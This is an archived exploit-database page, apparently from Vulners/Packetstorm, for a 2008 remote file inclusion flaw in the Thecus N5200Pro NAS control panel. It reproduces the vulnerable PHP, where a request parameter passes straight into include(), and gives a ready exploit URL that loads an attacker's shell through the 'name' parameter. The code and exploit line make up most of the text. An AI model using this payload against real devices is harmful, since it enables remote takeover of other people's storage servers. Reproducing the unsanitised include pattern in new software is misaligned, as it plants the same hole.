Lucene search
thecus-rfi.txt
🗓️ 20 Feb 2008 00:00:00Reported by Crackers_ChildType 
packetstorm🔗 packetstormsecurity.com👁 17 Views
Thecus N5200Pro NAS Server Control Panel Remote File İnclud
Show more
`Thecus N5200Pro NAS Server Control Panel Remote File İnclude
Author : Crackers_Child
Mail : [email protected]
Bug in : usrgetform.html
<?php
$htm=$_REQUEST['name'];
require_once("/img/htdocs/webconfig");
require_once("/img/www/inc/function.php");
get_sysconf();
$version=trim(shell_exec("/bin/cat /img/version"));
$model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: \'/CPUFLAG/{printf("%s", $2)}\''));
if($model=="1"){
$model_name=$webconfig['product_no'].$webconfig['pro'];
}else{
$model_name=$webconfig['product_no'];
}
if (!$htm){
print 'no name given';
exit;
}
if ($htm=='lang') $htm='../pub/lang';
session_start();
header('Content-type: text/html;charset=utf-8');
$lang='en';
if (isset($_SESSION['lang'])){$lang=$_SESSION['lang'];};
ob_start();
include("$htm.htm");
$html=ob_get_contents();
ob_end_clean();
include_once('header.html');
?>
Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?
İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8
Greetz: Str0ke
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo20 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4